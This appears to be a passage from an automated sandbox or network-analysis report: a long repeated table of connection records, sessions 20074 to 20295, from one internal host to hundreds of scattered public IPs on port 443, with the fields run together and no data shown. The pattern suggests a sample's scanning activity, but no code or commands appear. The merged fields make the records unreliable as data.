                                      20074192.168.2.145261434.110.190.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20075192.168.2.143579281.180.73.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20076192.168.2.145559853.174.136.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20077192.168.2.1453624161.20.99.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20078192.168.2.1445474109.117.17.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20079192.168.2.14347748.143.219.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20080192.168.2.1441294114.140.9.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20081192.168.2.1436422209.36.170.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20082192.168.2.1458644217.126.47.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20083192.168.2.1445968178.132.29.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20084192.168.2.1452502150.205.37.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20085192.168.2.1443820181.83.219.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20086192.168.2.144921412.94.2.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20087192.168.2.1448946115.188.179.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20088192.168.2.144443492.78.189.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20089192.168.2.145202049.62.238.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20090192.168.2.1450664171.199.80.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20091192.168.2.1449080142.67.117.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20092192.168.2.1460430156.194.97.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20093192.168.2.1451490117.107.84.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20094192.168.2.1448890106.190.158.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20095192.168.2.1452494158.170.206.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20096192.168.2.1444704111.80.249.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20097192.168.2.1449730151.114.83.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20098192.168.2.145085054.32.247.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20099192.168.2.1453824109.237.119.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20100192.168.2.1438362100.233.131.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20101192.168.2.145841634.214.193.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20102192.168.2.144743690.153.24.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20103192.168.2.146090234.221.34.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20104192.168.2.144797089.173.161.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20105192.168.2.1440424189.182.146.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20106192.168.2.145029251.255.69.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20107192.168.2.1449468166.182.61.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20108192.168.2.1443326183.24.201.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20109192.168.2.1439042169.183.73.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20110192.168.2.1460578160.76.143.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20111192.168.2.1433346104.239.221.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20112192.168.2.145683414.215.168.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20113192.168.2.145207293.157.117.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20114192.168.2.14530988.247.74.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20115192.168.2.1452046203.8.9.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20116192.168.2.1433788165.70.234.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20117192.168.2.144659850.234.118.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20118192.168.2.144623434.132.121.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20119192.168.2.1452490141.130.204.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20120192.168.2.1451424150.22.254.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20121192.168.2.1451106155.8.173.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20122192.168.2.143523883.4.190.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20123192.168.2.144423472.73.130.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20124192.168.2.1455812158.160.116.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20125192.168.2.1450122132.225.110.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20126192.168.2.145241496.172.165.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20127192.168.2.145311212.93.60.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20128192.168.2.1444094190.27.213.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20129192.168.2.1436590169.88.147.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20130192.168.2.145090454.87.211.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20131192.168.2.143552654.137.50.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20132192.168.2.1433848130.86.250.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20133192.168.2.1456620192.227.122.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20134192.168.2.1437780129.53.232.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20135192.168.2.1434762190.177.218.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20136192.168.2.145973089.136.175.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20137192.168.2.143655012.151.145.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20138192.168.2.1457624196.126.232.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20139192.168.2.144829623.134.24.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20140192.168.2.1456094130.154.137.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20141192.168.2.143736297.252.194.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20142192.168.2.143905843.60.182.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20143192.168.2.144028632.220.213.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20144192.168.2.1433012192.109.60.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20145192.168.2.145256880.223.19.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20146192.168.2.1458694125.35.246.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20147192.168.2.1433726145.218.176.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20148192.168.2.1432978182.220.221.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20149192.168.2.1440446180.115.194.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20150192.168.2.1451806110.76.136.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20151192.168.2.145626640.97.232.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20152192.168.2.1448866103.248.94.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20153192.168.2.1458950153.227.216.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20154192.168.2.1443738173.130.100.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20155192.168.2.146050483.142.172.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20156192.168.2.1446454148.32.231.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20157192.168.2.145813266.2.166.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20158192.168.2.1433638126.236.4.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20159192.168.2.1459092112.195.101.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20160192.168.2.145521293.253.179.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20161192.168.2.143701231.108.152.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20162192.168.2.1441922209.91.22.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20163192.168.2.1446634194.91.182.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20164192.168.2.1452732117.55.21.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20165192.168.2.1438042187.198.150.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20166192.168.2.145837431.52.190.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20167192.168.2.1436552212.250.121.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20168192.168.2.1437428109.165.136.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20169192.168.2.145786019.90.82.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20170192.168.2.1434064202.201.103.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20171192.168.2.14392008.22.247.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20172192.168.2.145908851.174.139.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20173192.168.2.1446802174.14.190.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20174192.168.2.1432938114.179.237.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20175192.168.2.145989484.136.182.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20176192.168.2.143472483.151.239.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20177192.168.2.1452338134.123.181.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20178192.168.2.145439653.20.50.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20179192.168.2.146039625.248.172.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20180192.168.2.143385678.184.121.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20181192.168.2.144070082.158.224.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20182192.168.2.14550688.195.11.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20183192.168.2.1460744109.177.94.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20184192.168.2.1433950147.217.63.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20185192.168.2.145225674.121.133.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20186192.168.2.143794692.211.206.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20187192.168.2.1438868199.110.21.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20188192.168.2.146045451.29.181.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20189192.168.2.1452214140.243.200.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20190192.168.2.144344460.10.25.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20191192.168.2.1435460207.103.192.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192192.168.2.1433928173.30.219.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20193192.168.2.1435170219.136.160.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20194192.168.2.1450486144.185.150.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20195192.168.2.1438144169.71.146.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20196192.168.2.143464267.76.146.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20197192.168.2.1458748204.233.49.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20198192.168.2.1456402148.234.239.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20199192.168.2.1460174220.245.218.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20200192.168.2.144772643.86.17.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20201192.168.2.1440862166.176.112.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20202192.168.2.145320678.96.242.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20203192.168.2.1439538173.228.75.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20204192.168.2.1442552120.196.145.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20205192.168.2.1440388161.13.16.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20206192.168.2.1448462206.59.205.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20207192.168.2.145634091.3.98.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20208192.168.2.1435672166.170.28.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20209192.168.2.1440756211.102.62.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20210192.168.2.1441672133.80.219.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20211192.168.2.144365019.74.185.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20212192.168.2.1439202180.87.89.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20213192.168.2.144999882.166.250.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20214192.168.2.1438018192.239.59.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20215192.168.2.144430218.199.125.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20216192.168.2.143540453.225.99.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20217192.168.2.144976464.14.110.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20218192.168.2.144075435.158.61.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20219192.168.2.1439862188.102.165.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20220192.168.2.1442480123.251.75.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20221192.168.2.1438558168.233.101.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20222192.168.2.1449688172.48.153.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20223192.168.2.144573865.74.117.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20224192.168.2.145159062.224.45.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20225192.168.2.1453264199.152.111.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20226192.168.2.14498988.186.111.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20227192.168.2.1439884120.154.207.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20228192.168.2.1435166182.83.119.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20229192.168.2.1449540113.155.251.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20230192.168.2.143673466.11.31.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20231192.168.2.143361497.108.208.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20232192.168.2.1454904115.45.173.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20233192.168.2.1451606217.23.47.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20234192.168.2.1454294130.171.196.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20235192.168.2.1453342123.207.192.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20236192.168.2.145992092.126.227.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20237192.168.2.14583002.71.130.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20238192.168.2.144428664.32.118.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20239192.168.2.1435716162.109.205.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20240192.168.2.1443502134.189.65.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20241192.168.2.145885637.12.193.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20242192.168.2.1455286106.162.60.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20243192.168.2.144988489.221.127.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20244192.168.2.1449778201.187.197.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20245192.168.2.143785665.141.32.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20246192.168.2.143778674.185.97.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20247192.168.2.1445402202.26.131.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20248192.168.2.144984613.215.224.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20249192.168.2.1433458132.192.119.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20250192.168.2.1457682151.111.219.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20251192.168.2.14329885.213.31.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20252192.168.2.1438574118.229.255.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20253192.168.2.1433266143.55.2.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20254192.168.2.144814449.217.242.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20255192.168.2.143977652.42.247.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20256192.168.2.143870646.247.244.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20257192.168.2.1444828149.84.6.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20258192.168.2.143761272.23.134.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20259192.168.2.1457902108.81.238.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20260192.168.2.145875641.89.143.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20261192.168.2.1455778167.36.237.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20262192.168.2.1443028147.227.35.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20263192.168.2.146089082.227.229.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20264192.168.2.144712847.131.79.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20265192.168.2.1449204116.106.89.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20266192.168.2.145202482.207.10.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20267192.168.2.1453524182.227.217.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20268192.168.2.1441162221.180.248.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20269192.168.2.1435932102.200.190.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20270192.168.2.145577839.150.138.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20271192.168.2.143488657.242.83.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20272192.168.2.1447140140.84.93.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20273192.168.2.1436430199.215.4.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20274192.168.2.1448348107.219.145.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20275192.168.2.143741891.180.204.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20276192.168.2.1448464119.252.145.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20277192.168.2.1444170148.14.19.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20278192.168.2.144275241.63.19.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20279192.168.2.146028090.139.154.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20280192.168.2.1440300106.127.29.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20281192.168.2.1452684140.192.152.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20282192.168.2.1440966186.7.71.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20283192.168.2.1449712124.228.74.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20284192.168.2.144040814.67.185.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20285192.168.2.1448806186.124.107.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20286192.168.2.1440980155.46.64.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20287192.168.2.145995468.12.6.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20288192.168.2.144000073.19.197.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20289192.168.2.1437408129.76.183.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20290192.168.2.14548408.88.11.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20291192.168.2.1441060109.24.67.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20292192.168.2.146021471.117.54.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20293192.168.2.1438856124.164.245.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20294192.168.2.144389447.226.100.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20295192.168.2.144762465.67.131.45443
                                      TimestampBytes transferredDirectionData


